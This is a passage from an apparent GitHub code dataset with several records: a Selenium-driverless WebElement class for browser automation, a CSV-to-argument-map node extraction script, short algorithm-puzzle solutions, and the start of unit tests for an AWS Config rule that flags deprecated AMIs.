frame_id=frame_id)\n else:\n return await WebElement(backend_node_id=node.get('backendNodeId'),\n target=self.__target__, loop=self._loop,\n class_name='HTMLIFrameElement',\n isolated_exec_id=None, frame_id=frame_id)\n\n # different target for cross-site\n targets = await self.__target__.get_targets_for_iframes([self])\n if targets:\n return await targets[0]._document_elem\n\n @property\n async def document_url(self):\n res = await self._describe()\n return res.get('documentURL')\n\n @property\n async def backend_node_id(self):\n if not self._backend_node_id:\n await self._describe()\n return self._backend_node_id\n\n @property\n def class_name(self):\n return self._class_name\n\n async def find_element(self, by: str, value: str, idx: int = 0, timeout: int or None = None):\n \"\"\"Find an element given a By strategy and locator.\n\n :Usage:\n ::\n\n element = element.find_element(By.ID, 'foo')\n\n :rtype: WebElement\n \"\"\"\n elems = []\n start = time.monotonic()\n while not elems:\n elems = await self.find_elements(by=by, value=value)\n if (not timeout) or (time.monotonic() - start) > timeout:\n break\n if not elems:\n raise NoSuchElementException()\n return elems[idx]\n\n async def find_elements(self, by: str = By.ID, value: str or None = None):\n \"\"\"Find elements given a By strategy and locator.\n\n :Usage:\n ::\n\n element = element.find_elements(By.CLASS_NAME, 'foo')\n\n :rtype: list of WebElement\n \"\"\"\n from selenium_driverless.types.by import By\n\n if by == By.ID:\n by = By.XPATH\n value = f'//*[@id=\"{value}\"]'\n elif by == By.CLASS_NAME:\n by = By.XPATH\n value = f'//*[@class=\"{value}\"]'\n elif by == By.NAME:\n by = By.XPATH\n value = f'//*[@name=\"{value}\"]'\n\n if by == By.TAG_NAME:\n return await self.execute_script(\"return obj.getElementsByTagName(arguments[0])\",\n value, serialization=\"deep\", unique_context=True, timeout=10)\n elif by == By.CSS_SELECTOR:\n elems = []\n node_id = await self.node_id\n res = await self.__target__.execute_cdp_cmd(\"DOM.querySelectorAll\", {\"nodeId\": node_id,\n \"selector\": value}, timeout=2)\n node_ids = res[\"nodeIds\"]\n for node_id in node_ids:\n if self._loop:\n from selenium_driverless.sync.webelement import WebElement as SyncWebElement\n # noinspection PyUnresolvedReferences\n elem = SyncWebElement(node_id=node_id, target=self.__target__, loop=self._loop,\n context_id=self.__context_id__,\n frame_id=await self.__frame_id__, 
isolated_exec_id=self.___isolated_exec_id__)\n else:\n # noinspection PyUnresolvedReferences\n elem = await WebElement(node_id=node_id, target=self.__target__, context_id=self.__context_id__,\n isolated_exec_id=self.___isolated_exec_id__,\n frame_id=await self.__frame_id__)\n elems.append(elem)\n return elems\n elif by == By.XPATH:\n script = \"\"\"return document.evaluate(\n arguments[0],\n obj,\n null,\n XPathResult.ORDERED_NODE_SNAPSHOT_TYPE,\n null,\n );\"\"\"\n return await self.execute_script(script, value, serialization=\"deep\", timeout=10, unique_context=True)\n else:\n return ValueError(\"unexpected by\")\n\n async def _describe(self):\n args = {\"pierce\": True}\n args.update(self._args_builder)\n res = await self.__target__.execute_cdp_cmd(\"DOM.describeNode\", args)\n res = res[\"node\"]\n self._backend_node_id = res[\"backendNodeId\"]\n self._node_id = res[\"nodeId\"]\n self.___frame_id__ = res.get(\"frameId\")\n return res\n\n async def get_listeners(self, depth: int = 3):\n res = await self.__target__.execute_cdp_cmd(\n \"DOMDebugger.getEventListeners\", {\"objectId\": await self.obj_id, \"depth\": depth, \"pierce\": True})\n return res['listeners']\n\n @property\n async def source(self):\n args = self._args_builder\n res = await self.__target__.execute_cdp_cmd(\"DOM.getOuterHTML\", args)\n return res[\"outerHTML\"]\n\n async def set_source(self, value: str):\n await self.__target__.execute_cdp_cmd(\"DOM.setOuterHTML\", {\"nodeId\": await self.node_id, \"outerHTML\": value})\n\n async def get_property(self, name: str) -> str or None:\n \"\"\"Gets the given property of the element.\n\n :Args:\n - name - Name of the property to retrieve.\n\n :Usage:\n ::\n\n text_length = target_element.get_property(\"text_length\")\n \"\"\"\n return await self.execute_script(f\"return obj[arguments[0]]\", name)\n\n @property\n async def tag_name(self) -> str:\n \"\"\"This element's ``tagName`` property.\"\"\"\n node = await self._describe()\n return node[\"localName\"]\n\n @property\n async def text(self) -> str:\n \"\"\"The text of the element.\"\"\"\n return await self.get_property(\"textContent\")\n\n @property\n async def value(self) -> str:\n \"\"\"The value of the element.\"\"\"\n return await self.get_property(\"value\")\n\n async def clear(self) -> None:\n \"\"\"Clears the text if it's a text entry element.\"\"\"\n await self.execute_script(\"obj.value = ''\", unique_context=True)\n\n async def remove(self):\n await self.__target__.execute_cdp_cmd(\"DOM.removeNode\", {\"nodeId\": await self.node_id})\n\n async def highlight(self, highlight=True):\n if not self.__target__._dom_enabled:\n await self.__target__.execute_cdp_cmd(\"DOM.enable\")\n if highlight:\n args = self._args_builder\n args[\"highlightConfig\"] = {\n \"showInfo\": True,\n \"borderColor\": {\n \"r\": 76, \"g\": 175, \"b\": 80, \"a\": 1\n },\n \"contentColor\": {\n \"r\": 76, \"g\": 175, \"b\": 80,\n \"a\": 0.24\n },\n \"shapeColor\": {\n \"r\": 76, \"g\": 175, \"b\": 80,\n \"a\": 0.24\n }\n }\n await self.__target__.execute_cdp_cmd(\"Overlay.enable\")\n await self.__target__.execute_cdp_cmd(\"Overlay.highlightNode\", args)\n else:\n await self.__target__.execute_cdp_cmd(\"Overlay.disable\")\n\n async def focus(self):\n args = self._args_builder\n return await self.__target__.execute_cdp_cmd(\"DOM.focus\", args)\n\n async def is_clickable(self, listener_depth=3):\n _type = await self.tag_name\n if _type in [\"a\", \"button\", \"command\", \"details\", \"input\", \"select\", \"textarea\", \"video\", \"map\"]:\n return 
True\n is_clickable: bool = listener_depth is None\n if not is_clickable:\n listeners = await self.get_listeners(depth=listener_depth)\n for listener in listeners:\n _type = listener[\"type\"]\n if _type in [\"click\", \"mousedown\", \"mouseup\"]:\n is_clickable = True\n break\n return is_clickable\n\n async def click(self, timeout: float = None, bias: float = 5, resolution: int = 50, debug: bool = False,\n scroll_to=True, move_to: bool = True, ensure_clickable: bool or int = False) -> None:\n \"\"\"Clicks the element.\"\"\"\n if scroll_to:\n await self.scroll_to()\n\n x, y = await self.mid_location(bias=bias, resolution=resolution, debug=debug)\n if ensure_clickable:\n is_clickable = await self.is_clickable()\n if not is_clickable:\n raise ElementNotClickable(x, y)\n\n await self.__target__.pointer.click(x, y=y, click_kwargs={\"timeout\": timeout}, move_to=move_to)\n\n async def write(self, text: str):\n await self.focus()\n await self.__target__.execute_cdp_cmd(\"Input.insertText\", {\"text\": text})\n\n async def send_keys(self, value: str) -> None:\n # noinspection GrazieInspection\n \"\"\"Simulates typing into the element.\n\n :Args:\n - value - A string for typing, or setting form fields. For setting\n file inputs, this could be a local file path.\n\n Use this to send simple key events or to fill out form fields::\n\n form_textfield = target.find_element(By.NAME, 'username')\n form_textfield.send_keys(\"admin\")\n\n This can also be used to set file inputs.\n\n ::\n\n file_input = target.find_element(By.NAME, 'profilePic')\n file_input.send_keys(\"path/to/profilepic.gif\")\n # Generally it's better to wrap the file path in one of the methods\n # in os.path to return the actual path to support cross OS testing.\n # file_input.send_keys(os.path.abspath(\"path/to/profilepic.gif\"))\n \"\"\"\n # transfer file to another machine only if remote target is used\n # the same behaviour as for java binding\n raise NotImplementedError(\"you might use elem.write() for inputs instead\")\n\n async def mid_location(self, bias: float = 5, resolution: int = 50, debug: bool = False):\n \"\"\"\n returns random location in element with probability close to the middle\n \"\"\"\n\n box = await self.box_model\n vertices = box[\"content\"]\n if bias and resolution:\n heatmap = gen_heatmap(vertices, num_points=resolution)\n exc = None\n try:\n point = gen_rand_point(vertices, heatmap, bias_value=bias)\n points = np.array([point])\n except Exception as e:\n points = np.array([[100, 100]])\n exc = e\n if debug:\n from selenium_driverless.scripts.geometry import visualize\n visualize(points, heatmap, vertices)\n if exc:\n traceback.print_exc()\n warnings.warn(\"couldn't get random point based on heatmap\")\n point = centroid(vertices)\n else:\n point = centroid(vertices)\n\n # noinspection PyUnboundLocalVariable\n x = int(point[0])\n y = int(point[1])\n return [x, y]\n\n async def submit(self):\n \"\"\"Submits a form.\"\"\"\n script = (\n \"/* submitForm */var form = this;\\n\"\n 'while (form.nodeName != \"FORM\" && form.parentNode) {\\n'\n \" form = form.parentNode;\\n\"\n \"}\\n\"\n \"if (!form) { throw Error('Unable to find containing form element'); }\\n\"\n \"if (!form.ownerDocument) { throw Error('Unable to find owning document'); }\\n\"\n \"var e = form.ownerDocument.createEvent('Event');\\n\"\n \"e.initEvent('submit', true, true);\\n\"\n \"if (form.dispatchEvent(e)) { HTMLFormElement.prototype.submit.call(form) }\\n\"\n )\n return await self.execute_script(script, unique_context=True)\n\n @property\n 
async def dom_attributes(self) -> dict:\n try:\n res = await self.__target__.execute_cdp_cmd(\"DOM.getAttributes\", {\"nodeId\": await self.node_id})\n attr_list = res[\"attributes\"]\n attributes_dict = defaultdict(lambda: None)\n\n for i in range(0, len(attr_list), 2):\n key = attr_list[i]\n value = attr_list[i + 1]\n attributes_dict[key] = value\n return attributes_dict\n except CDPError as e:\n if not (e.code == -32000 and e.message == 'Node is not an Element'):\n raise e\n\n async def get_dom_attribute(self, name: str) -> str or None:\n \"\"\"Gets the given attribute of the element. Unlike\n :func:`~selenium.webdriver.remote.BaseWebElement.get_attribute`, this\n method only returns attributes declared in the element's HTML markup.\n\n :Args:\n - name - Name of the attribute to retrieve.\n\n :Usage:\n ::\n\n text_length = target_element.get_dom_attribute(\"class\")\n \"\"\"\n attrs = await self.dom_attributes\n return attrs[name]\n\n async def set_dom_attribute(self, name: str, value: str):\n await self.__target__.execute_cdp_cmd(\"DOM.setAttributeValue\", {\"nodeId\": await self.node_id,\n \"name\": name, \"value\": value})\n\n async def get_attribute(self, name):\n \"\"\"Gets the given attribute or property of the element.\n\n This method will first try to return the value of a property with the\n given name. If a property with that name doesn't exist, it returns the\n value of the attribute with the same name. If there's no attribute with\n that name, ``None`` is returned.\n\n Values which are considered truthy, that is equals \"true\" or \"false\",\n are returned as booleans. All other non-``None`` values are returned\n as strings. For attributes or properties which do not exist, ``None``\n is returned.\n\n To obtain the exact value of the attribute or property,\n use :func:`~selenium.webdriver.remote.BaseWebElement.get_dom_attribute` or\n :func:`~selenium.webdriver.remote.BaseWebElement.get_property` methods respectively.\n\n :Args:\n - name - Name of the attribute/property to retrieve.\n\n Example::\n\n # Check if the \"active\" CSS class is applied to an element.\n is_active = \"active\" in target_element.get_attribute(\"class\")\n \"\"\"\n return await self.get_property(name)\n\n async def is_selected(self) -> bool:\n \"\"\"Returns whether the element is selected.\n\n Can be used to check if a checkbox or radio button is selected.\n \"\"\"\n result = await self.get_attribute(\"checked\")\n if result:\n return True\n else:\n return False\n\n async def is_enabled(self) -> bool:\n \"\"\"Returns whether the element is enabled.\"\"\"\n return not await self.get_property(\"disabled\")\n\n @property\n async def shadow_root(self):\n \"\"\"Returns a shadow root of the element if there is one or an error.\n Only works from Chromium 96, Firefox 96, and Safari 16.4 onwards.\n\n :Returns:\n - ShadowRoot object or\n - NoSuchShadowRoot - if no shadow root was attached to element\n \"\"\"\n # todo: move to CDP\n return await self.execute_script(\"return obj.ShadowRoot()\")\n\n # RenderedWebElement Items\n async def is_displayed(self) -> bool:\n \"\"\"Whether the element is visible to a user.\"\"\"\n # Only go into this conditional for browsers that don't use the atom themselves\n size = await self.size\n return not (size[\"height\"] == 0 or size[\"width\"] == 0)\n\n @property\n async def location_once_scrolled_into_view(self) -> dict:\n \"\"\"THIS PROPERTY MAY CHANGE WITHOUT WARNING. Use this to discover where\n on the screen an element is so that we can click it. 
This method should\n cause the element to be scrolled into view.\n\n Returns the top lefthand corner location on the screen, or zero\n coordinates if the element is not visible.\n \"\"\"\n await self.scroll_to()\n result = await self.rect\n return {\"x\": round(result[\"x\"]), \"y\": round(result[\"y\"])}\n\n async def scroll_to(self, rect: dict = None):\n args = self._args_builder\n if rect:\n args[\"rect\"] = rect\n try:\n await self.__target__.execute_cdp_cmd(\"DOM.scrollIntoViewIfNeeded\", args)\n return True\n except CDPError as e:\n if e.code == -32000 and e.message == 'Node is detached from document':\n return False\n\n @property\n async def size(self) -> dict:\n \"\"\"The size of the element.\"\"\"\n box_model = await self.box_model\n return {\"height\": box_model[\"height\"], \"width\": box_model[\"width\"]}\n\n async def value_of_css_property(self, property_name) -> str:\n \"\"\"The value of a CSS property.\"\"\"\n raise NotImplementedError(\"you might use get_attribute instead\")\n\n @property\n async def location(self) -> dict:\n \"\"\"The location of the element in the renderable canvas.\"\"\"\n result = await self.rect\n return {\"x\": round(result[\"x\"]), \"y\": round(result[\"y\"])}\n\n @property\n async def rect(self) -> dict:\n \"\"\"A dictionary with the size and location of the element.\"\"\"\n # todo: calculate form DOM.getBoxModel\n result = await self.execute_script(\"return obj.getClientRects()[0].toJSON()\", serialization=\"json\",\n unique_context=True)\n return result\n @property\n async def css_metrics(self):\n script = \"\"\"\n function getRotationAngle(target) \n {\n const _obj = window.getComputedStyle(target, null);\n const matrix = _obj.getPropertyValue('transform');\n let angle = 0; \n if (matrix !== 'none') \n {\n const values = matrix.split('(')[1].split(')')[0].split(',');\n const a = values[0];\n const b = values[1];\n angle = Math.round(Math.atan2(b, a) * (180/Math.PI));\n } \n \n return (angle < 0) ? 
angle +=360 : angle;\n }\n var _rects = obj.getClientRects()\n var rects = []\n for(let i = 0; i < _rects.length; i++){\n rects.push(_rects[i].toJSON())\n }\n var rotation = getRotationAngle(obj)\n return [rects, rotation]\n \"\"\"\n return await self.execute_script(script, max_depth=4)\n\n @property\n async def box_model(self):\n args = self._args_builder\n res = await self.__target__.execute_cdp_cmd(\"DOM.getBoxModel\", args)\n model = res['model']\n keys = ['content', 'padding', 'border', 'margin']\n for key in keys:\n quad = model[key]\n model[key] = np.array([[quad[0], quad[1]], [quad[2], quad[3]], [quad[4], quad[5]], [quad[6], quad[7]]])\n return model\n\n @property\n async def aria_role(self) -> str:\n \"\"\"Returns the ARIA role of the current web element.\"\"\"\n # todo: move to CDP\n return await self.get_property(\"ariaRoleDescription\")\n\n @property\n async def accessible_name(self) -> str:\n \"\"\"Returns the ARIA Level of the current webelement.\"\"\"\n # todo: move to CDP\n return await self.get_property(\"ariaLevel\")\n\n @property\n async def screenshot_as_base64(self) -> str:\n \"\"\"Gets the screenshot of the current element as a base64 encoded\n string.\n\n :Usage:\n ::\n\n img_b64 = element.screenshot_as_base64\n \"\"\"\n raise NotImplementedError()\n\n @property\n async def screenshot_as_png(self) -> bytes:\n \"\"\"Gets the screenshot of the current element as a binary data.\n\n :Usage:\n ::\n\n element_png = element.screenshot_as_png\n \"\"\"\n res = await self.screenshot_as_base64\n return b64decode(res.encode(\"ascii\"))\n\n async def screenshot(self, filename) -> bool:\n \"\"\"Saves a screenshot of the current element to a PNG image file.\n Returns False if there is any IOError, else returns True. Use full\n paths in your filename.\n\n :Args:\n - filename: The full path you wish to save your screenshot to. This\n should end with a `.png` extension.\n\n :Usage:\n ::\n\n element.screenshot('/Screenshots/foo.png')\n \"\"\"\n if not filename.lower().endswith(\".png\"):\n warnings.warn(\n \"name used for saved screenshot does not match file \" \"type. 
It should end with a `.png` extension\",\n UserWarning,\n )\n png = await self.screenshot_as_png\n try:\n with open(filename, \"wb\") as f:\n f.write(png)\n except OSError:\n return False\n finally:\n del png\n return True\n\n @property\n async def parent(self):\n \"\"\"The parent of this element\"\"\"\n args = {}\n if self._node_id:\n args[\"nodeId\"] = self._node_id\n else:\n args[\"objectId\"] = await self.obj_id\n node: dict = await self._describe()\n node_id = node.get(\"parentId\")\n if node_id:\n if self._loop:\n # noinspection PyUnresolvedReferences\n return SyncWebElement(node_id=node_id, target=self.__target__, context_id=self.__context_id__,\n isolated_exec_id=self.___isolated_exec_id__, frame_id=await self.__frame_id__)\n else:\n # noinspection PyUnresolvedReferences\n return WebElement(node_id=node_id, target=self.__target__, context_id=self.__context_id__,\n isolated_exec_id=self.___isolated_exec_id__, frame_id=await self.__frame_id__)\n\n @property\n def children(self):\n return self.find_elements(By.CSS_SELECTOR, \"*\")\n\n async def execute_raw_script(self, script: str, *args, await_res: bool = False, serialization: str = None,\n max_depth: int = 2, timeout: float = 2, execution_context_id: str = None,\n unique_context: bool = True):\n return await self.__exec_raw__(script, *args, await_res=await_res, serialization=serialization,\n max_depth=max_depth, timeout=timeout,\n execution_context_id=execution_context_id,\n unique_context=unique_context)\n\n async def execute_script(self, script: str, *args, max_depth: int = 2, serialization: str = None,\n timeout: float = 2, execution_context_id: str = None, unique_context: bool = True):\n return await self.__exec__(script, *args, max_depth=max_depth, serialization=serialization,\n timeout=timeout, unique_context=unique_context,\n execution_context_id=execution_context_id)\n\n async def execute_async_script(self, script: str, *args, max_depth: int = 2, serialization: str = None,\n timeout: float = 2, execution_context_id: str = None, unique_context: bool = True):\n return await self.__exec_async__(script, *args, max_depth=max_depth, serialization=serialization,\n timeout=timeout, unique_context=unique_context,\n execution_context_id=execution_context_id)\n\n def __repr__(self):\n return f'{self.__class__.__name__}(\"{self.class_name}\", obj_id={self.__obj_id__}, node_id=\"{self._node_id}\", backend_node_id={self._backend_node_id}, context_id={self.__context_id__})'\n\n def __eq__(self, other):\n if isinstance(other, WebElement):\n if other.__target__ == self.__target__:\n if other.__obj_id__ and self.__obj_id__:\n return other.__obj_id__.split(\".\")[0] == self.__obj_id__.split(\".\")[0]\n elif other._backend_node_id == self._backend_node_id:\n return True\n elif other._node_id == self._node_id:\n return True\n return False\n\n def __ne__(self, other):\n return not self.__eq__(other)\n","repo_name":"kaliiiiiiiiii/Selenium-Driverless","sub_path":"src/selenium_driverless/types/webelement.py","file_name":"webelement.py","file_ext":"py","file_size_in_byte":31820,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"81"} +{"seq_id":"70355102344","text":"import csv\nimport json\nimport re\n\n\ndef extract_node_ids(s):\n pattern = r'id=\"node(\\d+_\\d+)\"'\n matches = re.findall(pattern, s)\n return matches\n\n\ndef find_indexes(lst, target, current_indexes=[]):\n indexes = []\n for index, item in enumerate(lst):\n if isinstance(item, list):\n # If the item is a sublist, recursively call the 
function\n sub_indexes = find_indexes(item, target, current_indexes + [index])\n indexes.extend(sub_indexes)\n elif item.lower() == target:\n # If the item is the target string, add the current index\n indexes.append(current_indexes[-1])\n return list(set(indexes))\n\n\n# Read CSV file\nwith open(\"FriPa_new.csv\") as fp:\n reader = csv.reader(fp, delimiter=\",\", quotechar='\"')\n csv_FriPa = [row for row in reader]\n fripa_rows = list(reader)\n\nwith open(\"qt30.csv\") as fp:\n reader = csv.reader(fp, delimiter=\",\", quotechar='\"')\n csv_qt30 = [row for row in reader]\n\nfor i in csv_FriPa[1:]: # first two rows are examples (20.08.2023)\n date_fripa = \"cutietestrun\" + i[0].lower()\n date_fripa_s = \"cutiestestrun\" + i[0].lower() # used to search for appearances named with S\n response_part = i[4]\n response_text = i[9]\n response_json_ID = \"\"\n # looking for corpus in qt30 map\n date_indexes_qt30 = find_indexes(csv_qt30, date_fripa)\n # some of the rows have cutieStestrun in them. Next line calls a function again in that case\n if not date_indexes_qt30:\n date_indexes_qt30 = find_indexes(csv_qt30, date_fripa_s)\n for d in date_indexes_qt30:\n # search for json_ids using parts for answers\n if (csv_qt30[d][9] == response_part or csv_qt30[d][9] == \"part \" + response_part) and response_part != \"\":\n if len(csv_qt30[d][11]) <= 6: # there are texts instead of corpus numbers sometimes in the column\n json_corpus = csv_qt30[d][11]\n response_json_ID = json_corpus # writing to outer scope\n try:\n with open(\"jsons/\" + json_corpus + \".json\", encoding='utf-8-sig') as f:\n json_data = json.load(f)\n except FileNotFoundError:\n print(\"File \" + json_corpus + \" does not exist.\")\n json_text = json_data[\"text\"]\n node_list = extract_node_ids(json_text) # extracted all nodes referring to text\n relevant_nodes = []\n for node in json_data[\"AIF\"][\"nodes\"]:\n if node[\"nodeID\"] in node_list:\n regex = re.findall(r'^(?:[^:]*:)?\\s*(?:[^:]*:)?\\s*(.+)$', node[\"text\"])[0]\n # the RegEx will look for the text after a colon, so that the name of the speaker is omited\n # in some instances this will skip some of the text before the colon, but that should not pose an issue\n if len(regex.split()) > 3:\n regex = regex.split(' ', 1)[1]\n if regex in response_text:\n relevant_nodes.append(node[\"nodeID\"])\n i[11] = str(relevant_nodes)\n\nwith open('FriPa_new_dub.csv', 'w', newline='', encoding='utf-8') as f:\n csv_writer = csv.writer(f)\n csv_writer.writerows(csv_FriPa)\n","repo_name":"SeanEmanon/spansExtractor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18225962683","text":"def solution(num,triangle):\n n=int((num/3)//2)\n if n==0 :\n return triangle\n else :\n triangle=solution(num//2,triangle)\n for i in range(num//2):\n triangle.append(triangle[i]+\" \"+triangle[i])\n triangle[i]=\" \"*(num//2)+triangle[i]+\" \"*(num//2)\n return triangle\n \ntriangle=[\" * \",\" * * \",\"*****\"]# 각각 \" \"*n+triangle+triangle+\" \"*(num-1-2*줄수)+triangle\nnum = int(input())\nfor i in solution(num,triangle):\n print(i)\n\n\n# 어떤 입력이 주어지는지 확인하고 문제를 풀어야 한다.\n# 나는 입력이 3*2^k가 아닌 정수를 받아 그 수만큼 출력하는 줄 알고 풀었다. 
덕분에 많은 시간을 소요했다.\n# 그 개고생이 바로 밑의 코드이다.\n\n# def triangle (n, k, spacestart, nextspace):\n# if n!=1 :\n# spacestart, nextspace = triangle (n-1,k,spacestart,nextspace)\n# array=[1,2,2,4]\n\n# if n == spacestart :\n# spacestart = 2*(spacestart-1)+1\n# nextspace = spacestart-2\n# else :\n# nextspace-=2\n\n# # if (n+2)%3 == 0 :\n# # f.write((\" \"*(k-n))+(\"*\"+\" \"*nextspace)*((n-1)//12+1)*array[((n-1)//3)%4]+\"\\n\")\n# # elif (n+1)%3 == 0 :\n# # f.write((\" \"*(k-n))+(\"* *\"+\" \"*nextspace)*((n-1)//12+1)*array[((n-1)//3)%4]+\"\\n\")\n# # elif n%3 ==0 :\n# # f.write((\" \"*(k-n))+(\"*****\"+\" \"*nextspace)*((n-1)//12+1)*array[((n-1)//3)%4]+\"\\n\")\n# print(\" \"*(k-n), end=\" \")\n# quarter=(n-1)//12+1\n# if (n+2)%3 == 0 :\n# for i in range(quarter):\n# print((\"*\"+\" \"*(nextspace if quarter%2!=0 or n<=12 else nextspace-12*(quarter-1)))*array[((n-1)//3)%4],end=\"\")\n# print(\"\")\n# elif (n+1)%3 == 0 :\n# for i in range(quarter):\n# print((\"* *\"+\" \"*nextspace)*array[((n-1)//3)%4],end=\"\")\n# print(\"\")\n# elif n%3 ==0 :\n# for i in range(quarter):\n# print((\"*****\"+\" \"*nextspace)*array[((n-1)//3)%4],end=\"\")\n# print(\"\")\n# return (spacestart,nextspace)\n\n# n = int(input())\n# # f = open(\"output.txt\", 'w')\n# # triangle(n,n,4,-1,f)\n# # f.close()\n# triangle(n,n,4,-1)\n","repo_name":"HorangApple/TIL","sub_path":"Algorithm/Baekjoon/2448_별 찍기-11.py","file_name":"2448_별 찍기-11.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"45889820456","text":"class Solution:\n def countPrimes(self, n: int) -> int:\n total = 0\n prime = [False, False] + [True] * (n-2)\n\n for i in range(2, n):\n if prime[i]:\n for j in range(i*2, n, i):\n prime[j] = False\n\n\n return sum(prime)\n \n","repo_name":"xgfelicia/general-coding-practice","sub_path":"python3/count-primes.py","file_name":"count-primes.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73114779465","text":"#\n# This file made available under CC0 1.0 Universal (https://creativecommons.org/publicdomain/zero/1.0/legalcode)\n#\n# Created with the Rule Development Kit: https://github.com/awslabs/aws-config-rdk\n# Can be used stand-alone or with the Rule Compliance Engine: https://github.com/awslabs/aws-config-engine-for-compliance-as-code\n#\n\nimport unittest\nfrom unittest.mock import patch, MagicMock\nfrom botocore.exceptions import ClientError\nimport rdklib\nfrom rdklib import Evaluation, ComplianceType\nfrom rdklibtest import assert_successful_evaluation\n\n#############\n# Main Code #\n#############\n\nMODULE = __import__('AMI_DEPRECATED_CHECK')\nRULE = MODULE.AMI_DEPRECATED_CHECK()\n\n#example for mocking S3 API calls\nCLIENT_FACTORY = MagicMock()\nEC2_CLIENT_MOCK = MagicMock()\nASG_CLIENT_MOCK = MagicMock()\n\ndef mock_get_client(client_name, *args, **kwargs):\n if client_name == \"ec2\":\n return EC2_CLIENT_MOCK\n elif client_name == 'autoscaling':\n return ASG_CLIENT_MOCK\n raise Exception(\"Attempting to create an unknown client\")\n\n\ndef mock_evaluator_handle(event, context):\n return f\"Event: {event} - Context: {context}\"\n\n\n@patch.object(CLIENT_FACTORY, \"build_client\", MagicMock(side_effect=mock_get_client))\nclass ComplianceTest(unittest.TestCase):\n\n deprecated_ami_response = {\n \"Images\": [\n {\n \"CreationDate\": \"2021-07-19T19:03:00.000Z\",\n \"ImageId\": \"ami-abcd1234\",\n \"Name\": 
\"test-image\",\n \"DeprecationTime\": \"2021-07-21T17:03:00.000Z\"\n }\n ]\n }\n\n compliant_ami_response = {\n \"Images\": [\n {\n \"CreationDate\": \"2021-07-01T19:03:00.000Z\",\n \"ImageId\": \"ami-abcd1234\",\n \"Name\": \"test-image\"\n }\n ]\n }\n\n missing_ami_response = {'Images': []}\n\n instance_response = {\n \"Reservations\": [\n {\n \"Groups\": [],\n \"Instances\": [\n {\n \"ImageId\": \"ami-abcd1234\",\n \"InstanceId\": \"i-abcd1234\"\n }\n ]\n }\n ]\n }\n\n asg_launch_template = {\n \"AutoScalingGroups\": [\n {\n \"AutoScalingGroupName\": \"test-asg\",\n \"LaunchTemplate\": {\n \"LaunchTemplateId\": \"lt-xyz789\",\n \"LaunchTemplateName\": \"test-lt\",\n \"Version\": \"1\"\n }\n }\n ]\n }\n\n asg_mixed_instances = {\n \"AutoScalingGroups\": [\n {\n \"AutoScalingGroupName\": \"test-asg\",\n \"MixedInstancesPolicy\": {\n \"LaunchTemplate\": {\n \"LaunchTemplateSpecification\": {\n \"LaunchTemplateId\": \"lt-xyz789\",\n \"LaunchTemplateName\": \"test-lt\",\n \"Version\": 1\n }\n }\n }\n }\n ]\n }\n\n asg_launch_config = {\n \"AutoScalingGroups\": [\n {\n \"AutoScalingGroupName\": \"test-asg\",\n \"LaunchConfigurationName\": \"test-lc\"\n }\n ]\n }\n\n launch_template_versions = {\n 'LaunchTemplateVersions': [\n {\n 'LaunchTemplateData': {\n 'ImageId': 'ami-6057e21a'\n },\n 'LaunchTemplateId': \"lt-xyz789\",\n 'LaunchTemplateName': \"test-lt\",\n 'VersionNumber': 2,\n }\n ]\n }\n\n launch_config = {\n \"LaunchConfigurations\": [\n {\n \"LaunchConfigurationName\": \"test-lc\",\n \"ImageId\": \"ami-abcd1234\"\n }\n ]\n }\n\n def setUp(self):\n EC2_CLIENT_MOCK.reset_mock()\n ASG_CLIENT_MOCK.reset_mock()\n\n def test_evaluate_compliant_instance(self):\n EC2_CLIENT_MOCK.describe_instances.return_value = self.instance_response\n EC2_CLIENT_MOCK.describe_images.return_value = self.compliant_ami_response\n response = RULE.evaluate_periodic({}, CLIENT_FACTORY, {'mode': 'EC2'})\n instance = self.instance_response['Reservations'][0]['Instances'][0]\n response_expected = [Evaluation(\n complianceType=ComplianceType.COMPLIANT,\n resourceId=instance['InstanceId'],\n resourceType='AWS::EC2::Instance',\n annotation=f'Image {instance[\"ImageId\"]} is not deprecated'\n )]\n assert_successful_evaluation(self, response, response_expected)\n\n def test_evaluate_noncompliant_instance_deprecated_ami(self):\n EC2_CLIENT_MOCK.describe_instances.return_value = self.instance_response\n EC2_CLIENT_MOCK.describe_images.return_value = self.deprecated_ami_response\n response = RULE.evaluate_periodic({}, CLIENT_FACTORY, {'mode': 'EC2'})\n instance = self.instance_response['Reservations'][0]['Instances'][0]\n response_expected = [Evaluation(\n complianceType=ComplianceType.NON_COMPLIANT,\n resourceId=instance['InstanceId'],\n resourceType='AWS::EC2::Instance',\n annotation=f'Image {instance[\"ImageId\"]} is deprecated'\n )]\n assert_successful_evaluation(self, response, response_expected)\n\n def test_evaluate_noncompliant_instance_missing_ami(self):\n EC2_CLIENT_MOCK.describe_instances.return_value = self.instance_response\n EC2_CLIENT_MOCK.describe_images.return_value = self.missing_ami_response\n response = RULE.evaluate_periodic({}, CLIENT_FACTORY, {'mode': 'EC2'})\n instance = self.instance_response['Reservations'][0]['Instances'][0]\n response_expected = [Evaluation(\n complianceType=ComplianceType.NON_COMPLIANT,\n resourceId=instance['InstanceId'],\n resourceType='AWS::EC2::Instance',\n annotation=f'Error checking {instance[\"ImageId\"]}, assuming noncompliant'\n )]\n assert_successful_evaluation(self, 
response, response_expected)\n\n def test_evaluate_asg_mixed_instances_launch_template_compliant(self):\n ASG_CLIENT_MOCK.describe_auto_scaling_groups.return_value = self.asg_mixed_instances\n EC2_CLIENT_MOCK.describe_launch_template_versions.return_value = self.launch_template_versions\n EC2_CLIENT_MOCK.describe_images.return_value = self.compliant_ami_response\n response = RULE.evaluate_periodic({}, CLIENT_FACTORY, {'mode': 'ASG'})\n asg = self.asg_mixed_instances['AutoScalingGroups'][0]\n launch_template_version = self.launch_template_versions['LaunchTemplateVersions'][0]\n response_expected = [Evaluation(\n complianceType=ComplianceType.COMPLIANT,\n resourceId=asg['AutoScalingGroupName'],\n resourceType='AWS::AutoScaling::AutoScalingGroup',\n annotation=f'Image {launch_template_version[\"LaunchTemplateData\"][\"ImageId\"]} is not deprecated'\n )]\n assert_successful_evaluation(self, response, response_expected)\n\n def test_evaluate_noncompliant_asg_launch_config_deprecated_ami(self):\n 